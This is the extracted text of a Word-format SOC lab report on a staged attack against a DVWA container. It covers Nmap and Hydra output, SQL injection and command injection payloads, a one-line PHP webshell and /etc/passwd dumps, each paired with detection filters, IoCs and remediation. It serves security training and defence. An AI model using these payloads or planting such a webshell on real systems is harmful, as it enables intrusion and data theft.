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SOC ANALYST REPORT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Network Attack Detection Lab</w:t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b/>
          <w:bCs/>
          <w:color w:val="9DC3E6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA — Multi-Stage Attack Lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1F3864" w:val="clear"/>
        <w:spacing w:after="480" w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="BDD7EE"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Analyst: Laiba Rana   |   Date: 01 May 2026   |   Classification: Educational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Between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09:00 and 09:45 UTC on 01 May 2026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, a multi-stage attack was detected against a Damn Vulnerable Web Application (DVWA) instance running in a containerised lab environment. The attack followed the complete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 Kill Chain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: reconnaissance, credential access, exploitation, and persistence.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Security Events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(SOC-001 through SOC-006)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/ High Findings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requiring immediate remediation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IP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172.17.0.3 (Kali Linux container)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 IP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172.17.0.2 (DVWA container)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 Window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09:00 – 09:45 UTC, 01 May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Evidence Collected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Wireshark capture, tcpdump logs, tool outputs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Findings Summary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17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Kill Chain Phase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mDNS Noise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Info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SOC-002a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Information Disclosure (setup.php)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T1082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Reconnaissance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SOC-002b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Nmap Service Scan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T1046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Reconnaissance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Brute Force Attack (Hydra)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Credential Access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T1190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Access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Command Injection (RCE)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T1059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Webshell Upload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T1505.003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Persistence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Lab Environment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Machine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Kali Linux (Docker: kalilinux/kali-rolling)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 Application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DVWA v1.9 (vulnerables/web-dvwa)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Apache 2.4.25 (Debian)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Database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bridge (172.17.0.0/16)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Capture Tools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Wireshark (loopback), tcpdump (container-to-container)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Methodology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Baseline Establishment — Captured normal background traffic (mDNS, ARP) to distinguish noise from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Attack Simulation — Launched attacks from Kali container against DVWA.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Packet Capture — Used Wireshark on loopback interface and tcpdump on the Docker bridge.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Analysis — Mapped each finding to the Cyber Kill Chain and MITRE ATT&amp;CK framework.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Detailed Findings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SOC-001 — Baseline Traffic: mDNS Discovery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Benign / Baseline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mDNS (Multicast DNS)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Windows/WSL virtual adapter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224.0.0.251 (Multicast)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_googlecast._tcp.local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— Informational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During initial packet capture, repeated mDNS queries were observed targeting the link-local multicast address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224.0.0.251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. These originate from the host OS and represent normal device/service discovery (Chromecast). This establishes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baseline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against which subsequent attack traffic is compared.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SOC-002a — Information Disclosure: DVWA Setup Page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Information Disclosure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browser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172.17.0.2:80/setup.php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T1082 — System Information Discovery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DVWA setup page (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/setup.php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) is accessible without authentication and discloses sensitive system details.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 Leaked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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Linux (*nix)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Version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7.0.30 (End-of-Life: December 2018)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 Username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 Database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dvwa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Writable Directories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'/hackable/uploads/' and '/config/'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allow_url_fopen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 attacker can tailor exploits using known PHP 7.0.30 CVEs and target the writable upload directory for webshell deployment.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Restrict or remove setup.php after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IP whitelisting for all administrative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Upgrade PHP to a currently supported version.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SOC-002b — Reconnaissance: Nmap Service Scan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Reconnaissance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IP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172.17.0.3 (Kali)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Destination IP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Destination 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80/tcp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Detected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Nmap 7.99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T1046 — Network Service Scanning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executed Nmap service version scans (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-sV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) against the target. The scan sent TCP SYN packets to 1,000 ports, identifying port 80 as open running Apache httpd 2.4.25 on Debian.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Nmap Output (terminal capture):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   STATE SERVICE VERSION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80/tcp open  http    Apache httpd 2.4.25 ((Debian))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MAC Address: EE:34:33:D1:55:D9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(tcpdump):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Rapid burst of ~1,000 SYN packets followed by successful TCP handshake on port 80 and HTTP GET for banner grabbing.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IDS/IPS rules to alert on port-scan patterns (high SYN rate from single source).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network segmentation so container-to-container traffic is restricted.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Suppress server version banners in Apache config: ServerTokens Prod, ServerSignature Off.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SOC-003 — Brute Force Attack: Hydra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Credential Access — Brute Force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IP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172.17.0.2:80/login.php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 Detected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Hydra v9.6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T1110 — Brute Force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Following reconnaissance, the attacker launched a dictionary-based brute force attack against the DVWA login form. Hydra submitted 10 login attempts in under 1 second using a password wordlist.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Hydra Terminal Output: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[DATA] attacking http-post-form://172.17.0.2:80/login.php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[ATTEMPT] login "admin" - pass "admin"    - 1 of 10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[ATTEMPT] login "admin" - pass "password" - 2 of 10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[ATTEMPT] login "admin" - pass "123456"   - 3 of 10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[80][http-post-form] host: 172.17.0.2   login: admin   password: password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(tcpdump):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10 sequential POST requests to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/login.php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, each with incrementing password= values. One response returned 302 Found with Location: index.php, confirming successful login.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Indicators of Compromise (IoCs):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High-rate POST requests (10 in &lt;1 second) to login endpoint from a single source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Sequential, automated password enumeration pattern.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account lockout after 5 consecutive failed login attempts.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Apply rate limiting (max 3 requests/second per IP) on login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Enforce strong password policy (minimum 12 characters with complexity requirements).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CAPTCHA on login forms to block automated tools.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SOC-004 — SQL Injection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Access — SQL Injection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session (admin)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/vulnerabilities/sqli/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1' OR '1'='1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T1190 — Exploit Public-Facing Application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exploited a SQL injection vulnerability in the DVWA SQL Injection module. The payload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1' OR '1'='1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bypassed the intended query logic and returned all rows from the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table.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(tcpdump — HTTP POST body):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/vulnerabilities/sqli/ HTTP/1.1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id=1' OR '1'='1&amp;Submit=Submit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(Wireshark):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Frame 1537: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/vulnerabilities/sqli/?id=1%27+OR+%271%27%3D%271&amp;Submit=Submit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URL-decoded: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id=1' OR '1'='1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Dumped Data (users table):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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="393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Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="393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Surname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Gordon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Hack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Pablo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Picasso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Bob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Smith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Follow-up UNION Attack (potential impact):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1' UNION SELECT user, password FROM users #</w:t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would expose password hashes for all users if executed.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Root Cause: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User input is concatenated directly into SQL queries without sanitisation or parameterised queries.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prepared statements (parameterised queries) for all database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input validation and whitelisting on all user-supplied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Apply the principle of least privilege for database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a Web Application Firewall (e.g., ModSecurity) with SQLi ruleset.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SOC-005 — Command Injection (Remote Code Execution)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Execution — Command Injection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session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/vulnerabilities/exec/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127.0.0.1; whoami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T1059 — Command and Scripting Interpreter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exploited a command injection vulnerability in the DVWA ping utility. Appending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; whoami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to the IP address input caused the server to execute arbitrary OS commands.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Commands Executed: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127.0.0.1; whoami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www-data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 web server user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127.0.0.1; ls -la /var/www/html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directory listing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Enumerate web root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127.0.0.1; cat /etc/passwd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accounts list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Escalate reconnaissance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(Wireshark):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HTTP POST request body contained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ip=127.0.0.1%3B+whoami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URL-decoded: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ip=127.0.0.1; whoami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Terminal Output (captured):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PING 127.0.0.1 (127.0.0.1): 56 data bytes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64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=3.043 ms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www-data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gained remote code execution as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www-data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, enabling full system enumeration and paving the way for persistence.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Sanitise all user inputs by escaping shell metacharacters (;, |, &amp;, `, $()).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whitelist validation for IP address inputs (reject anything that is not a valid IPv4 address).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Execute system commands through safe APIs such as escapeshellarg() in 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the web server with minimal privileges inside a chroot jail or container.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hd w:fill="2E75B6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SOC-006 — Webshell Upload (Persistence)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Persistence — Webshell Upload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Authenticated session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/hackable/uploads/shell.php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T1505.003 — Server Software Component: Web Shell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uploaded a PHP webshell via the DVWA File Upload vulnerability. The file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shell.php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accepts arbitrary commands via the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URL parameter, establishing persistent remote code execution.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Webshell Code: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&lt;?php system($_GET["cmd"]); ?&gt;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Commands Executed via Webshell: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68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shell.php?cmd=whoami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www-data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shell.php?cmd=cat%20/etc/passwd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system account dump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(Wireshark — Frame 1533): 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/hackable/uploads/shell.php?cmd=cat%20/etc/passwd HTTP/1.1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Evidence (tcpdump — response body excerpt):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E75B6" w:sz="12" w:space="4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root:x:0:0:root:/root:/bin/bash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daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin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www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">
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mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false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attacker established persistent remote code execution. The webshell can be accessed at any time to execute commands, exfiltrate data, or pivot to other systems in the network.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Immediately remove shell.php from /hackable/uploads/.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Validate file types server-side (allow only specific safe extensions).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Store uploaded files outside the web root so they cannot be executed by the web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Scan uploaded files for malicious content using an antivirus or file-inspection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Disable PHP execution in upload directories via .htaccess (php_flag engine off).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Cyber Kill Chain Mapping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5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Reconnaissance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SOC-002a, SOC-002b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Information disclosure (setup.php) + Nmap service scan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Weaponisation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Attacker prepared SQLi payloads, Hydra wordlist, and PHP webshell prior to engagement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Credential Access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Dictionary brute force against login form via Hydra — not a 'delivery' mechanism but active exploitation of weak authentication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Initial Access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 returned full users table; UNION attack potential exposed password hashes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Execution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Command injection granted RCE as www-data; /etc/passwd exfiltrated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Installation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webshell uploaded to /hackable/uploads/shell.php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 Command &amp; Control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Webshell accessed via HTTP GET with ?cmd= parameter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 Actions on Obj.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/etc/passwd exfiltrated; full file system access achieved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MITRE ATT&amp;CK Matrix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 Service Scanning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T1046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SOC-002b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Information Discovery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SOC-002a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Exploit Public-Facing Application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T1190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T1059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Shell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T1505.003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Indicators of Compromise (IoCs)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Associated Finding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 Address (Source)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172.17.0.3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attacks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Path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/hackable/uploads/shell.php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?cmd= parameter in GET requests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id=1' OR '1'='1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ip=127.0.0.1; (command injection)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Anomaly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&gt;5 POST requests/second to /login.php from single IP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SOC-003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Remediation Roadmap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shell.php from /hackable/uploads/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or restrict access to /setup.php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SOC-002a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prepared statements for all SQL queries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Sanitise shell metacharacters in all user inputs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 account lockout + rate limiting on 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Disable PHP execution in upload directories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Upgrade PHP from 7.0.30 to a supported version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SOC-002a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WAF (e.g., ModSecurity) with OWASP ruleset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SOC-004, SOC-005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EA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network segmentation for containers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SOC-002b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Conclusion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lab demonstrated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complete attack lifecycle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against a vulnerable web application. The attacker progressed methodically from passive reconnaissance through active credential access, SQL injection, command injection, and finally established persistence via a PHP webshell — all without triggering any automated defence because none existed.</w:t>
      </w:r>
    </w:p>
    <w:p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single unprotected page (setup.php) provided enough information to tailor every subsequent attack — information disclosure is an underrated first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Vulnerability chaining is the norm, not the exception: SQLi exposed data, command injection enabled RCE, and the file upload provided persistent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Defence-in-depth is required — input validation, WAF, least privilege, account lockout, and monitoring would each have broken a link in this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SOC analysts must distinguish baseline noise (mDNS, ARP) from attack traffic. The ability to filter and recognise normal behaviour is foundational to effective triage.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— Wireshark Display Filters Used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Exclude baseline noise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!(mdns or arp or ssdp or nbns or llmnr)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HTTP traffic to DVWA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tcp.port == 80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Webshell access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http.request.uri contains "shell.php"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http.request.uri contains "OR" or http contains "1=1"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Brute force POST requests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http.request.method == POST and http.request.uri contains "login"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Evidence collected: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dvwa-attacks.pcapng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(Wireshark capture), tcpdump logs from Kali container, Nmap and Hydra terminal outputs.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Analyst: Laiba Rana  |  Date: 01 May 2026  |  Classification: For Educational Use Only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SOC ANALYST REPORT — NETWORK ATTACK DETECTION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2026-05-01T09:56:22.824Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-01T09:56:22.824Z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